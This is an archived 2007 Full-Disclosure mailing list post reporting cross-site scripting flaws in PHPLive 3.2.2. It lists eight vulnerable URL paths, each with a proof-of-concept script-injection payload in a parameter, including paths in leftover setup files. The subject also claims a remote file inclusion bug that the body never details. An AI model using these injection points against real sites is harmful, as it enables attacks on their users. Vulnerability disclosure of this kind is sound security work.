[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] PHPLive ALL VERSION: RFI + XSS
From: dr.rezen () gmail ! com
Date: 2007-06-01 17:06:07
Message-ID: E1HuAZj-00084R-AU () rancor ! nocdirect ! com
[Download RAW message or body]
There are numerous XSS vulnerabilities in PHPLive v3.2.2 (Maybe others)
/phplive/chat.php?sid=<script>alert(123);</script>
/phplive/help.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script>
/phplive/help.php?PHPLIVE_VERSION=<script>alert(123);</script>
/phplive/admin/header.php?admin[name]=<script>alert(123);</script>
/phplive/super/info.php?BASE_URL=<script>alert(123);</script>
And if serveradmin left default setup install files:
/phplive/setup/footer.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script>
/phplive/setup/footer.php?PHPLIVE_VERSION=<script>alert(123);</script>
/phplive/setup/footer.php?nav_line=<script>alert(123);</script>
Bug found by ReZEN! XORCREW! H4X H4X!
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic